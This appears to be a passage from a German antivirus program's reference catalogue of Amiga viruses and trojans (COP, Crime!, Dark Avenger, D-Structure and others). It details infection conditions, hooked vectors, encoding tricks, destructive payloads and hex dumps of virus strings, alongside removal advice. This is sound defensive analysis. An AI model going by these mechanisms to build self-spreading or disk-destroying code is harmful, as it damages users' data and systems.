203a5b63 cOp]: Khanan :[c 4f705d64 6576733a 00733a00 6262733a Op]devs:.s:.bbs: 004c3a00 4e434f4d 4d3a0000 20245645 .L:.NCOMM:.. $VE 523a2041 43502056 352e3020 2843292d R: ACP V5.0 (C)- Ablauf: Es wird ein Fenster geoeffnet und ein COP-Text ausgegeben. Das MUSS dem User auffallen. Empfehle sofort RESET. Vielleicht ist der Schaden noch zu begrenzen. Vorsicht: die Festplatte duerfte dann allerdings Validating-Probleme haben. Die Files in devs, s, bbs, L und NCOMM werden auf 20 Bytes gekuerzt. Inhalt danach z.B.: printer.device 0000: 5b634f70 5d3a204b 68616e61 6e203a5b [cOp]: Khanan :[ 0010: 634f705d cOp] Tut mir leid, da ist nichts mehr zu retten. VT bietet nur Loeschen an, da ACP V5.0 eine Faelschung sein duerfte. - COP-Trojan Typ G Zerstoerungsfile CopKiller Laenge: 8428 Bytes KEINE verbogenen Vektoren KEINE Vermehrung Taeuschung durch ungepackten Text am Fileende: f0760bf2 436f7070 4b696c6c 65722076 .v..CoppKiller v 312e3120 6279204a 6f6c6c65 202f2053 1.1 by Jolle / S 484920a9 20313939 350a00ff 004a2216 HI . 1995....J". Decodiert (NOT.B D0 und addi.b #$7F,d0) ist im File zu lesen: 79000000 011f0000 00000000 00ea5b63 y.............[c 4f705d3a 2053636f 74636820 26204b68 Op]: Scotch & Kh 616e616e 206f6e20 746f7572 20273935 anan on tour '95 203a5b63 4f705d64 6576733a 00733a00 :[cOp]devs:.s:. 6262733a 004c3a00 4e434f4d 4d3a0000 bbs:.L:.NCOMM:.. Auf Grund eines Programmierfehlers werden "nur" die Files in devs: auf 41 Bytes gekuerzt. Inhalt z.B.: printer.device 0000: 5b634f70 5d3a2053 636f7463 68202620 [cOp]: Scotch & 0010: 4b68616e 616e206f 6e20746f 75722027 Khanan on tour ' 0020: 3935203a 5b634f70 5d 95 :[cOp] Tut mir leid, da ist nichts mehr zu retten. VT bietet nur Loeschen an. Groessere Teile des Zerstoerungs-Files werden NIE erreicht. Sie sind also nur zur Fileverlaengerung gedacht. - COP-LZX-Trojan Typ H Zerstoerungsfiles Ein Archiv mit angeblich LZX130 . ALLE LZX in diesem Archiv waren verseucht. KEINE verbogenen Vektoren KEINE Vermehrung VT bietet nur Loeschen an, da sich jeder die Original-LZX120 (ja an diese wurde gelinkt) besorgen kann. Decodiert (NOT.B D0 und addi.b #$7F,d0) ist im File zu lesen: 3d434952 434c45b7 4f46b750 =CIRCLE.OF.P 4f574552 3d205b20 54484520 52455455 OWER= [ THE RETU 524e204f 46205448 4520504f 57455220 RN OF THE POWER 50454f50 4c452120 50484541 52205553 PEOPLE! PHEAR US 21205d6e 636f6d6d 00006262 73000064 ! ]ncomm..bbs..d 65767300 00730000 656e7661 72630000 evs..s..envarc.. 6c696273 00000000 libs.... Sie sehen KEINE ":" hinter den SubDirs. Die Files in den SubDirs sollen auf #63 Bytes gekuerzt werden. Nach kurzer Zeit habe ich IMMER den GURU gesehen. Auf einer Maschine ist die Verseuchung ueberhaupt nicht begonnen worden, sondern die Maschine nur stehen- geblieben. printer.device 0000: 3d434952 434c45b7 4f46b750 4f574552 =CIRCLE.OF.POWER 0010: 3d205b20 54484520 52455455 524e204f = [ THE RETURN O 0020: 46205448 4520504f 57455220 50454f50 F THE POWER PEOP 0030: 4c452120 50484541 52205553 21205d00 LE! PHEAR US! ]. - Copy_LX-Trojan Zerstoerungsfile Copy gelinkt Laenge: 6932 Bytes Copy orig. KS3.0 : 5496 Bytes Keine verbogenen Vektoren VT bietet Ausbau an. Ablauf: Es sind drei codierte Bereiche im Link, wovon zwei mit sub.b #$xy,d0 decodiert werden. Es ergibt sich: c: NICHT decodiert s:SAVE scsi Es wird zuerst nach s:SAVE gesucht. Falls gefunden, normal copy aus- fuehren. Also wahrscheinlich ein Schutz fuer den Programmierer. Die Systemzeit wird geprueft. Vor 13. Juni 94 normaler Copy-Befehl. Die Dos-Strukturen werden auf scsi (scsi.device) untersucht. Falls nicht gefunden, normaler Copy-Befehl. Es wird eine Berechnung durchgefuehrt, die in den Rootblock Nullen schreiben soll. Die Festplattenpartition waere dann unbrauchbar. Versuchen Sie z.B. mit DiskSalv zu retten, was zu retten ist. Da das Teil mit lsl.l #x,d0 (mehrmals=9) arbeitet, wird nur bei Festplatten mit Blockgroesse 512 der Rootblock geloescht. Neuere KS koennen aber auch andere Blockgroessen verwalten (HDToolBox). Der Installer ist noch UNBEKANNT !!! Es wird LX1.03 genannt, aber ich finde nichts in dem File. Falls jemand "mehr Glueck" hat, bitte ich um einen Hinweis. Danke !! Laenge bei mir: LX 17040 LX020 16764 - CopyLock-Virus BB Block 0-3 Bitte NICHT mit Orginal-BB CopyLock verwechseln. Cool $7F498 nach Reset DoIo $7F4C8 KS 2.04: ja Fordert trackdisk.device NICHT Namensbegruendung: s.u. Vermehrung: BB Dazu wird der urspruengliche BB geladen, ein paar Bytes am An- fang einkopiert und dann mit Virus in Block 2 u. 3 wieder ab- gespeichert. Bei einem fluechtigen Blick sehen Sie zum Beispiel noch einen Text und denken es waere noch der Original-BB. LASSEN SIE SICH NICHT TAEUSCHEN !!!!! Schaeden: Da es sich um 4 Blocke handelt wird nicht nur der Original-BB zerstoert, sondern auch ein File das Datenbloecke in Block 2 und 3 hat. Ablauf: Es werden 4 Bloecke nach $7F000 kopiert und grosse Teile mit sub.b d5,(a0)+ decodiert. Bei der Neucodierung fuer eine neue Verseuchung ist d5 abhaengig von $DFF006 . Das Teil wird aktiviert mit DoIo und lesendem Zugriff auf Block 880 ( nur bei DD-Disk Rootblock). Die Textteile werden NIE gezeigt. 20436f70 796c6f63 6b20416d 69676120 Copylock Amiga 28632920 526f6220 4e6f7274 6865726e (c) Rob Northern 2e20416c 6c207269 67687473 20726573 . All rights res 65727665 642e2000 41fa01fc 43f90007 erved. .A...C... ;........ 2a205945 50212052 4f42204e 4f525448 * YEP! ROB NORTH 45524e20 4f4e2054 48452042 4f415244 ERN ON THE BOARD 2021204d 5920434f 50594c4f 434b5320 ! MY COPYLOCKS 41524520 4655434b 00205448 45204352 ARE FUCK. THE CR 41434b45 52532041 52452042 45545445 ACKERS ARE BETTE 52205448 414e204d 452e2054 48415460 R THAN ME. THAT` 53205748 59204960 4d205752 4954494e S WHY I`M WRITIN 47202056 49525553 45532021 21212028 G VIRUSES !!! ( 494e2054 48452048 4f504520 54484154 IN THE HOPE THAT 20544845 59204152 45204245 54544552 THEY ARE BETTER 20415320 4d592043 4f50594c 4f434b53 AS MY COPYLOCKS 2129202a 00000000 00000000 00000000 !) *............ Hinweis: da das VirusTeil Block 2 u. 3 nicht als belegt kenn- zeichnet, kann bei einem Speichervorgang Block 2/3 neu beschrie- ben werden, wenn diese Bloecke im BitMapBlock frei waren. Da das Virusteil zerstoert ist, der Sprungbefehl in Block 0 aber noch vorhanden ist, werden Sie wahrscheinlich beim Booten eine GURU-Meldung bekommen. - Crackright anderer Name: Disk-Doktors s.u. - CRACKER Exterminator BB Cool: $7AEAA DoIo: $7AEC2 Fordert trackdisk.device NICHT KS2.04: ja Namensbegruendung: im BB ist uncodiert zu lesen 54686520 43524143 4b455220 45787465 The CRACKER Exte 726d696e 61746f72 48e7fffe 6000002c rminatorH...`.., Der BB enthaelt auch einen codierten Bereich eori.b #$27,(a1)+ , der NIE erreicht wird: 303c00ad 46110a19 002751c8 fff84869 0<..F....'Q...Hi 20686163 6b657221 20796f75 7220616d hacker! your am 69676120 69732069 6e666563 74656420 iga is infected 77697468 2061206e 65772067 656e6572 with a new gener 6174696f 6e206f66 20766972 75732063 ation of virus c 616c6c65 643a2054 68652043 5241434b alled: The CRACK 45522045 78746572 6d696e61 746f7220 ER Exterminator 21206d61 64652062 793a2041 3a433a43 ! made by: A:C:C 3a57205b 416e7469 2d437261 636b6572 :W [Anti-Cracker 2d436c75 622d5765 73745d20 68617665 -Club-West] have 2066756e 2c20796f 75206675 636b696e fun, you fuckin 67206372 61636b65 72210000 00000000 g cracker!...... Vermehrung: BB Schaeden: Aktiviert wird das Teil, wenn mit DoIo lesend auf Block 880 (ist nur bei DD-Disk der RootBlock) zugegriffen wird. In Abhaengigkeit von der Zaehlzelle bei $7FF00 (4) findet eine Vermehrung statt oder die "FloppyMusik"-Routine wird ge- startet. Diese Routine beansprucht ihr LW sehr stark und kann deshalb zu Hardware-Schaeden fuehren. Diese Routine ist vom Gadaffi-Virus abgekupfert. - Cracker Ext. Installer (erzeugt BB s.o.) File verseucht: 50868 Bytes BB-Teil ausgebaut: 49152 Bytes An ACP (BBS) wurde mit Hunklab ein BootJob-File gehaengt. In diesem BootJob-File wurde der Programmierername geloescht. Im Virus-BB wurde der uncodierte Text mit sinnlosen Zeichen ueber- schrieben. Der eor-codierte Bereich ist weiterhin mit gleichem Inhalt vorhanden. VT sollte Ausbau anbieten. Vgl. auch TAI7-Installer, East-Star-Install - cREATOr-Prg Formatroutine Schwachsinn !!!!! Besteht aus 2 Files In c CREATOR.SCR 40 Bytes IN s cREATOr.DAT 2880 Bytes KEINE verbogenen Vektoren KEINE Vermehrung In File-ID wird behauptet: * Thiz Powerful Tool Will Let You Choose * * How Fazt Your HD (Mili Seconds) Shall * * Run After Every Reset !!! Normally Thiz * Laut Dok soll der User execute c:creator.scr eingeben. Darauf DARF NIEMAND hereinfallen. In der shell wird Return-Taste gefordert Danach erscheint eine Format-Zeile. Die Disk heisst danach cREATOr. Meine Meinung: Schwachsinn Gefaehrlich ist also eigentlich nur das CREATOR.DAT Teil und die File-ID. Hinweis: cREATOr.DAT wurde auch auf PD-Disks gefunden. Nur heisst es da format und der Sinn des Files ist leicht zu er- kennen. >>RAD:c/Format >> cREATOr-Prg - CREEPING EEL BB Vergleiche auch: Executor.BB, Kimble.BB Namensbegruendung: siehe unten KS2.04: nein Fordert trackdisk.device NICHT verbogene Vektoren: Cool, DoIo Speicherlage: immer ab $7EC00 Vermehrung und Schaeden: BB UND !!!!! Schreibt in einen Zylinder, der bei einer Disk (880kb) dem Root-Zylinder entspricht (bei Festplatte ergibt sich ein anderer Zyl.), Datenmuell aus Speicher ab $60000. Diese Disks sind NICHT MEHR zu retten. Tut mir leid. Versuchen Sie bitte mit z.B. disksalv noch einige File von anderen Zylindern zu retten. Sobald die Zaehlzelle den Wert $14 erreicht hat: - Deutschland-Farben auf dem Bildschirm - Text, der uncodiert im BB steht 2d204865 6c6c6f20 436f6d70 75746572 - Hello Computer 66726561 6b202d2d 2d000016 004e596f freak ---....NYo 75277665 20676f74 206e6f77 20796f75 u've got now you 72206669 72737420 56495255 532e0000 r first VIRUS... 002a0068 2a2a2a2a 20544845 20435245 .*.h**** THE CRE 4550494e 47204545 4c20202a 2a2a2a00 EPING EEL ****. 002f0082 4d616e79 20446973 6b732061 ./..Many Disks a 72652069 6e666563 74656420 21210000 re infected !!.. 001e00b4 57726974 74656e20 6279203e ....Written by > 4d415820 4f462053 5441524c 49474854 MAX OF STARLIGHT 3c200000 003c00be a9203239 2e30342e < ...<... 29.04. 31393932 203c3c4d 41583e3e 20200000 1992 <<MAX>> .. - Crime! Linkvirus verlaengert ein File um 1000 Bytes. Haengt sich an den ersten Codehunk an. Cool, AllocMem, Dos: Open, LoadSeg, Dosbase+$2e KS2.04 = NEIN Kein Meldeprogrammteil gefunden. Kann sich MEHRMALS in gleiches File haengen, da schon-befallen Routine fehlt. (nach 3 Links ans gleiche File habe ich aufgehoert) Allerdings muss dazwischen immer ein anderes File aufgerufen wer- den, damit der Filenamenbuffer (vom VirusPrg. angelegt) ueberschrie- ben wird. Im Speicher werden 19 Bytes mit eori.b #$5e,-1(a5) decodiert: Crime!00dos.library Vermehrungsbedingungen: - Flag Disk o.k. ($52) - #16 Block free - File kleiner als #102400 (#$19000) - 1.LW #$3F3 (File ausfuehrbar) - #$3E9 wird gefunden (1.Hunk ist CodeHunk) - letzter Befehl im 1.Hunk ist #$4E75 (RTS). Virus traegt dann $4E71 (NOP) ein. oder wird bis $3E+1 Wort-Schritte zurueck gefunden. Virus traegt dann $60xy (bra.s xy) ein. - Name enthaelt nicht: #, *, -, ., ?, Speichererkennung mit VT getestet: 15.02.92 Ausbau mit VT getestet: 16.02.92 wichtig !!!!!!!!!! VT sollte im Filetest das befallene File sicher finden. Da die anderen VT-Routinen zum Teil blockorientiert arbeiten, koennen nur 2 Langworte im Block liegen und das 3. LW im naechsten Block. VT meldet sich dann NICHT !!! Hinweis 31.08.92: Ab VT2.44 sollten mehrere CrimeLinks ans gleiche File in einem Durchgang ausgebaut werden. Falls nein, melden Sie sich bitte. Danke - Crime!++ Linkvirus verlaengert ein File um 872 Bytes. Haengt sich an den ersten Codehunk an. Cool, Wait, Dos: Dosbase+$2e KS2.04 = NEIN (die Linkroutine wird zwar aktiviert, aber Dosbase+$2e stimmt NICHT. Deshalb kein Link sondern haeufig GURU. Kein Meldeprogrammteil gefunden. Kann sich MEHRMALS in gleiches File haengen, da schon-befallen Routine fehlt. (nach 5 Links ans gleiche File habe ich aufgehoert) Im Speicher werden $1A5+1 Worte mit eor.w d1,(a0)+ decodiert: Crime!++ d1 wird bei jedem Linkversuch ueber $DFF00A neu festgelegt. Vermehrungsbedingungen: - Flag Disk o.k. ($52) - #16 Block free - File kleiner als #102400 (#$19000) - 1.LW #$3F3 (File ausfuehrbar) - #$3E9 wird gefunden (1.Hunk ist CodeHunk) - letzter Befehl im 1.Hunk ist #$4E75 (RTS). Virus traegt dann $4E71 (NOP) ein. oder wird bis $3F+1 Wort-Schritte zurueck gefunden. Virus traegt dann $60xy (bra.s xy) ein. Speichererkennung mit VT getestet: 24.05.92 Ausbau mit VT getestet: 25.05.92 wichtig !!!!!!!!!! VT sollte im Filetest das befallene File sicher finden. Da die anderen VT-Routinen zum Teil blockorientiert arbeiten, koennen nur 2 Langworte im Block liegen und das 3. LW im naechsten Block. VT meldet sich dann NICHT !!! wichtig 2: verseuchte Files sind lauffaehig: VT sollte den Urzustand wieder herstellen koennen. verseuchte Files sind NICHT lauffaehig: Die Linkroutine ist nicht ++ , sondern enthaelt mehrere Fehler- quellen, die in Crime! nicht vorhanden waren. EINEN Fehler er- kennt VT und versucht ihn beim Ausbau auszubessern. Bitte mit einer Kopie ausbauen !!!! wichtig 3: Es werden AUCH Files mit einem "." im Namen verseucht. Beweis: Es wurde ein Datablock ausgedruckt. Danach waren ver- seucht: c/print, devs/printer.device, devs/parallel.device, und devs/printer/NEC . wichtig 4: Nach dem Ausbau rufen Sie bitte BlockITest auf und loeschen alle jetzt noch gefunden Crime!++ - Bloecke (auf der Diskkopie!!!). Das entseuchte File wird nicht unbedingt an die gleiche Stelle auf der Disk zurueckgespielt und so kann ein NICHT mehr aufrufbarer Block stehenbleiben. Danach rufen Sie bitte Blockkette auf und testen die Files auf richtige Verkettung. Sollten vor BlockITest bei BlockKette alle Files noch in Ordnung gewesen sein und jetzt nicht mehr, dann fuehren Sie bitte mit der Disk, die noch nicht mit BlockItest nachbehandelt wurde ein EinzelFileCopy durch. Auch hier werden nur die belegten und benutzten Blocks kopiert. UND rufen Sie mich bitte an. Danke Hinweis 31.08.92: Ab VT2.44 sollten mehrere Crime++Links ans gleiche File in einem Durchgang ausgebaut werden. Falls nein, melden Sie sich bitte. Danke Ursprung: driveinfo trojanisches Pferd s.u. - Crime'92 Linkvirus verlaengert ein File um 1800 Bytes 1.HunkEnde Namensbegruendung: decodiert im Speicher: 4372696D 65273932 000048E7 FFFE47FA Crime'92.. Fordert trackdisk.device NICHT resetfest, Virusprogramm meldet sich nicht. Liegt immer im ChipMem. Codierung wechselt. Verbogene Vektoren bis KS1.3 einschl. : Cold, Cool, Wait (exec) dosbase+$2e Verbogene Vektoren ab KS1.4 ($23) : Cool, Wait (exec), LoadSeg, NewLoadSeg 68040: NUR OHNE Cache Schaeden: abhaengig vom Wert einer Zaehlzelle: Schreibt in Block 2-7 (=6 Blocks) von Track 0 Speichermuell (der geschriebene Speicher kann auch nur Nullen enthalten). Sollten da Datenbloecke von Programmen gelegen haben, so sind diese Programme unbrauchbar. KEINE Rettung moeglich. Tut mir leid. Wenn das VirusPrg nun den Rigid-Track ihrer Festplatte zerstoert (fordert trackdisk.device NICHT), so ist die Festplatte nach dem naechsten Reset NICHT mehr ansprechbar !!!! Ich hoffe Sie haben ein Backup ????? ab Block 2 move.l #$400,$2c(a1) 6 Blocks move.l #$C00,$24(a1) Vermehrung: - Flag Disk o.k. ($52) (validated) - #8 Block frei - File kleiner als #102400 (#$19000) - 1.LW #$3F3 (File ausfuehrbar) - #$3E9 wird gefunden (1.Hunk ist CodeHunk) - Test auf schon befallen - Virus sucht ab Ende 1.Hunk nach RTS. Steht RTS genau am Ende, dann wird es mit den ersten zwei Bytes von $48e7fffe (movem.l d0-a6,-(a7)) ueberschrieben. Steht RTS nicht am Ende, dann wird bis $3e+1 Wort-Schritte zurueck gesucht. Virus traegt $60xy (bra.s xy) ein. - Die CodierRoutine ist sehr variabel gestaltet: - Wechsel der CodierRoutine - Wechsel des Beginns des codierten Bereichs im Virus- teil Speichererkennung mit VT getestet: 22.10.92 Ausbau mit VT getestet: 23.10.92 wichtig1 !!!!!!! Bitte aktivieren Sie die DruckOption zuerst in Prefs. Es koennte mit den notwendigen Druckprogrammen Crime'92 eingeladen werden. Beim naechsten GadgetKlick im Hauptfenster MUSS VT den Crime'92 dann im Speicher finden !!!! Zumindest bei meinen Tests. wichtig2 !!!!!!!!!! VT sollte im Filetest das befallene File sicher finden. Da die anderen VT-Routinen zum Teil blockorientiert arbeiten, koennen nur 2 Langworte im Block liegen und das 3. LW im naechsten Block. VT meldet sich dann NICHT !!! Nachtrag 03.07.93: Crime 92 Variante (CodierRoutine anders) erhalten. Fileerkennung musste geaendert werden. Speichererkennung musste NICHT geaendert werden. Nachtrag 04.07.93: Es ist ein verseuchtes Testfile aus absolut zuverlaessiger Quelle aufgetaucht, bei dem das letzte Langwort im Orginalhunk zerstoert war . Dieses File ist AUCH nach dem Crime92-Ausbau noch defekt. Beispiel: der 1.Hunk wuerde mit "dos.library",0 enden. Bei diesem Vorgang wuerde dann "dos.libr",$5cef5def entstehen. Beim Ver- such, die dos.library zu oeffnen wuerde ein Fehler entstehen. Es ist mir in zwei Stunden nicht gelungen, diese Variante selbst zu erzeugen. - D&A FileVirus Laenge:1052 Bytes anderer Name SCA Dos Kill Cool immer $7E3CE und nach Reset auch DoIo KS2.04: keine BB-Verseuchung gelungen, Vektoren aber verbogen Schaeden: Das FileVirus schreibt bis KS1.3 auf eine nicht schreib- geschuetzte Disk einen BB dem die DOS0-Kennung fehlt. Dort steht dafuer $00000400 . Das Betriebssystem meldet deshalb mit einem Requester "Not a Dos Disk" . Schreiben Sie einfach einen Standard- Bootblock auf diese Disk. Der defekte BB ist ein leicht geaenderter SCA-BB (z.B. SCA! durch D&A! ersetzt). Das File muessen Sie loeschen. Schauen Sie bitte auch in der startup-sequence nach, ob dieser File- name vorkommt und loeschen Sie diese Zeile. Vermutung: Dieser BB wurde mit einem Prg. erzeugt, das aus einem BB ein Execute-File macht. Gibt es leider auch auf FF. Lesen Sie dazu auch FileTest bei SP-File-Sp in VT2.xyd . - D-Structure A/B/C-Virus immer ab $7C000 oldOpenLib immer $7C06E Write (-$30) immer $7C0CC nicht resetfest Name: D-Structure in der Mitte des Files zu lesen Typ A: Filelaenge: 428 Bytes Typ B: Filelaenge: 352 Bytes (haeufig Absturz) Typ C: Filelaenge: 464 Bytes (21.10.92) Typ A u. B : ffd24e75 0007c200 0007c204 442d5374 ..Nu........D-St 72756374 75726500 c24033ee 000003ec ructure..@3..... Typ C: C2000007 C204442D 53747275 63747572 A...A.D-Structur 65202000 000003F3 00000000 00000002 e ....o........ ^^^^ ^^ also mit zwei zusaetzlichen Leerzeichen Ablauf: - allocabs $7C000 - oldOpenlib wird gerettet und verbogen - wenn nun ein anderes Programm oldopenlib aufruft, wird getestet ob dos.library geoeffnet werden soll. wenn nein: z.B. intuition.lib - newopenlib wird ausgefuehrt und D-Structure wartet weiter wenn ja: - dosBase wird gerettet - Orig-Write wird gerettet und verbogen - oldopenlib wird zurueckgesetzt - newopenlib wird ausgefuehrt beim 5. Aufruf von Write wird nun nicht das Gewuenschte ge- schrieben (in cli, auf disk usw.), sondern das VirusPrg ab $7C000. Dieses File auf Disk ist leider nicht zu retten. - VirusPrg meldet sich NICHT !!!! Empfehlung: loeschen Sie das VirusPrg und alle zerstoerten Files. Ueberpruefen Sie bitte die startup-sequence. D-Structure A/B-File-Erkennung mit VT getestet: 09.09.92 D-Structure A/B-Speicher mit VT getestet: 09.09.92 D-Structure C mit VT getestet: 21.10.92 - DAG Cool, im Prg DoIo und zurueck, Fastmem ja, immer ab $7ec00 eine Meisterleistung: in den SCA-Text wurde eingebaut: Try ANTIVIRUS from DAG Erzeuger: DAG_Creator ungepackt:7000 Bytes oder 7360 Bytes schreibt Dag in BB von df1: - dailer-BBS V2.8g Von der Definition kein Virus, da keine Ver- mehrung. Ein Einbruchswerkzeug in BBS . Das Hauptprogramm duerfte eine Bluebox sein. Gepackt mit CrunchMania: Laenge: 11992 Bytes Laenge entpackt: 33908 Bytes Wird von VT entpackt als XLink erkannt. Also war meine Ver- mutung, dass auch dieses Programm fuer Viren missbraucht wird, RICHTIG !!!! Im File ist dann zu lesen: 79006262 733a7573 65722e64 61746100 y.bbs:user.data. 6262733a 6e6f6465 312f4e4f 43414c4c bbs:node1/NOCALL 45525341 54333030 00010000 000003ec ERSAT300........ ;....... 4469616c 65722076 322e3867 2f555044 Dialer v2.8g/UPD 41544544 20425920 53545249 4b455220 ATED BY STRIKER Oeffnet user.data und speichert ein paar Bytes in NOCALLERSAT300 ab. Hinweis: Entpacken Sie das File. VT sollte dann XLink erkennen. Gehen Sie dann in den File-Requester. Klicken Sie das File an und anschliessend auf 1Linkaus. Der 1.Link sollte im File abgeschaltet werden. Nachkontrollieren koennen Sie das mit SnoopDos, wenn Sie VT nicht trauen. SnoopDos -l darf keinen Lock auf bbs:user.data mehr anzeigen. - DarkAvenger-Virus Link Starke Aehnlichkeit mit Infiltrator (nur dosopen statt loadseg). Also keine Meisterleistung. Die Namenswahl zeugt von grosser Selbstueberschaetzung . Verbiegt DosOpen Nicht resetfest KS 1.3: ja KS 2.04: ja A4000/40 : 10 Files sind gelaufen und haben eine Disk jeweils komplett verseucht. Ablauf: Auf A2000 mit KS2.04 wurde eine komplette Disk verseucht. Auf dieser Disk sind dann unge- faehr 20 verseuchte Files auf dem A2000 ohne GURU gelaufen. Von diesen 20 verseuchten Files waren auf dem A4000/40 10 Files ohne Guru lauffaehig. (Cache aus) Typ A und Typ B sind bekannt. siehe unten Das Virusteil haengt sich immer neu codiert nach dem 1.Hunk ein. Arbeitsweise gleich fuer Typ A und B: - Sucht nach dem Langwort, das die Laenge des 1.CodeHunks enthaelt und erhoeht den Wert um $11A (TypA) oder $10C (TypB) . - Schreibt zu Beginn des 1. CodeHunks 6100xxyy (bsr xxyy) d.h. der OriginalSourceCode wird ueberschrieben. - Haengt sich codiert am Ende des 1.OriginalCodeHunks an. d.h. keine Erhoehung der HunkAnzahl. Vermehrungsbedingungen: - Disk validated - mindestens 8 Bloecke Platz - 1. CodeHunk nicht groesser als $1ffc * 4 = $7FF0 - Filelaenge groesser #2000 Bytes und - Filelaenge kleiner #100000 Bytes - Test 1. Wort im CodeHunk auf - $4EF9 (Jmp) falls ja keine Verseuchung - $4EB9 (Jsr) falls ja keine Verseuchung - Test ob schon von DarkAvenger verseucht 1. Wort im CodeHunk auf - $6100 (bsr) falls ja 2. Test an anderer Stelle auf - $FFFE6004 (Typ A) oder $FFFE4E71 (Typ B) falls ja schon verseucht, deshalb Ende. Ergebnis: verseucht auch libs, devices, fonts usw. Erfolg: NICHT alle Programme sind danach lauffaehig !!!!! Typ A: Verlaengert ein File um $11a x 4 = $468 = #1128 Bytes In Abhaengigkeit von $DFF006 wird mit setwindowtitles -=- The Dark Avenger -=- gesetzt Selbsterkennung im Speicher mit $A0A1 Decodiert mit subi.b x,(a3)+ ( x aendert sich bei jeder Ver- mehrung in Abhaengigkeit von $DFF006 ) ist im Speicher zu lesen: 6974696f 6e2e6c69 62726172 7900202d ition.library. - 3d2d2054 68652044 61726b20 4176656e =- The Dark Aven 67657220 2d3d2d00 ger -=-. Typ B: Verlaengert ein File um $10c x 4 = $430 = #1072 Bytes Die setwindowtitles-Routine fehlt. Selbsterkennung im Speicher mit $A0A1A2A3 Decodiert mit eori.b x,(a3)+ ( x aendert sich bei jeder Ver- mehrung in Abhaengigkeit von $DFF006 ) ist im Speicher zu lesen: 732e6c69 62726172 79005265 6d696e64 s.library.Remind 65727320 6f662070 61737420 2c206665 ers of past , fe 6172206f 66207468 65206675 74757265 ar of the future 3a205345 50544943 20534348 495a4f2e : SEPTIC SCHIZO. 3d2d2054 68652044 61726b20 4176656e =- The Dark Aven 67657220 2d3d2d00 ger -=-. Ausbau: VT versucht den Originalzustand wieder herzustellen. Falls es Probleme gibt, wenden Sie sich bitte an mich. NACH dem FileTest machen Sie bitte ein EinzelFileCopy auf eine leere formatierte Disk. (QUICK genuegt nicht) Diskcopy nuetzt nichts, da dabei alle Bloecke kopiert werden. Zwei Gruende: - die Fragmentierung der Files wird aufgehoben (Disk ist wieder schneller) - es werden nur benutzte Bloecke kopiert, d.h. jetzt nicht mehr von Files belegte Bloecke werden nicht mitkopiert und so kann dann auch BlockITest keinen DarkAvenger auf der NEUEN Disk in einem unbenutzten Block finden. Beispiel siehe unten Block: 23 0000: 00000008 0000048f 0000000e 0000004c ...............L 0010: 00000000 00000000 815b0864 94717800 .........[.d.qx. 0020: 716c1612 0a717cc5 2e3b1680 1f23f407 ql...q|..;...#.. 0030: f469d07d 1c0d278d 90280351 3d800401 .i.}..'..(.Q=... 0040: 3d000c1c 9d6fc6cd 3e9cab9f fde08dc4 =....o..>....... 0050: 02400408 81420010 0c04f46d 00246c09 .@...B.....m.$l. 0060: 000003f2 2a20e8b5 4e759044 7200e8ad ....* ..Nu.Dr... ^^^^ ;hier neues FileEnde 0070: 6708e9b1 51c8fff8 4e752a20 e8b560f2 g...Q...Nu* ..`. 0080: 300461e8 70001035 10003401 b4466616 0.a.p..5..4..Ff. 0090: 61cc6502 700761d2 36017002 61ced441 a.e.p.a.6.p.a..A 00a0: b24767f6 600461c2 3601d444 17333000 .Gg.`.a.6..D.30. 00b0: 51cafffa 33cb00df f1a2b5cb 65804e75 Q...3.......e.Nu 00c0: 09090909 000024b4 4e468280 48e7fffe ......$.NF..H... ^^^^^^^^ alter VirusCode Das alte Virusteil ist im Block geblieben, und wurde vom neuen Fileende nicht ueberschrieben, da nicht der ganze Block benoetigt wird. VT wuerde im BlockITest den Dark Avenger finden. Im FileTest NATUERLICH NICHT !!!! Dies hat NICHTS mit VT zu tun, sondern liegt am Amiga- Betriebssystem. Suche: Sie MUESSEN mit FileTest suchen. Bei BlockKette kann eine Meldung unterbleiben, wenn von den 3 Testlangworten 2 im Block x und 1 LW im Block x+1 liegen. Bitte: Suchen Sie NICHT nach verseuchten Files, solange ein sogenanntes "Nutzprogramm" aktiv ist, das dosopen verbiegt. Hinter diesem Nutzprg koennte der DarkAvenger liegen !!! Folge: Das Nutzprogramm ueberprueft beim Laden das File und stellt fest, dass das File von ihm NICHT zu bearbeiten ist (also z.B. nicht gepackt) und uebergibt an den "OrigDos- Open-Vektor". Nur leider ist der "OrigDosOpen-Vektor" auf die DarkAvenger-Routine verbogen !!!! Ihre Erfolgsaussichten sind NULL !!!!!! Falls VT das "Nutzprogramm" nicht kennt, koennen Sie im Hauptfenster in Tools mit setze OVektoren dosopen zuruecksetzen. Hinweis fuer Szeneprogrammierer: Der Trick mit Hunk_Symbol, Hunk_Name oder ChipKennung verhindert bei diesem Virus- teil den Linkvorgang NICHT (!!!!!), da mit cmpi.w #$3E9,(a0)+ gearbeitet wird. Hinweis: starten Sie BITTE den Druck IMMER aus Prefs. Hier wird das printer.device nach Aufruf auf Linkvirusbefall geprueft. - DARTH VADER File Laenge: 784 Bytes Cool und nach Reset auch OldOpenLib Vermehrung und Schaeden: - sobald OldOpenLib verbogen ist, versucht sich das Prg. im Root-Verzeichnis als $A0 zu vermehren. In die 1.Zeile der Startup-Sequence wird $A00A geschrieben. - sobald in der Zaehlzelle der Wert 6 steht, wird mit Output ausgegeben: VIRUS(V1.1) BY DARTH VADER Fehlerquellen: nicht mit KS2.04 nicht mit FastMem mit 1Mb Chip nur mit setpatch r Kann nur eine startup-sequence bis zur Groesse #1000 richtig veraendern. Empfehlung: loeschen und 1.Zeile in der startup-sequence mit Editor ebenfalls loeschen. Loeschen mit VT getestet: 26.04.92 - DASA anderer Name: ByteWarrior s.o. - DAT '89 nur KS1.2 da DoIoRomEinsprung, KickTag, KickCheckSum immer 7F800, versucht durch Text im BB zu taeuschen: THIS BOOT RESETS ALL VECTORS usw. Sobald die Zaehlzelle $F erreicht, DisplayAlert: DAT '89!!! Fordert NICHT trackdisk.device !!!! Schaeden: schreibt sich in BB zerstoert Block 880 und 881 (bei Disk Root) - DAT89-TAI9-Clone: Text geaendert: 3b2d2d29 2e2c3a2e 542e2e41 2c2c492e ;--).,:.T..A,,I. 2e495800 00000000 00002020 67726170 .IX....... grap - DATA CRIME CCCP-Clone s.o. BB Vermehrung auch mit ROM KS2.04 CCCP-VIRUS in DATA CRIME geaendert (irre Leistung) hat aber bei VT NICHTS genuetzt !!!, also lasst das - DATACRIME-killer BB s.o. ASV-BB Endlich hat es wieder jemand geschafft den ASCII-Text zu aendern .. THIS BOOTBLOCK KNOWS SOME OLD AND NEW VIRUSES usw. Wird von VT weiterhin als ASV erkannt. Pech gehabt !! - DATALOCK BB BB ist codiert Decodierter BB im Speicher immer 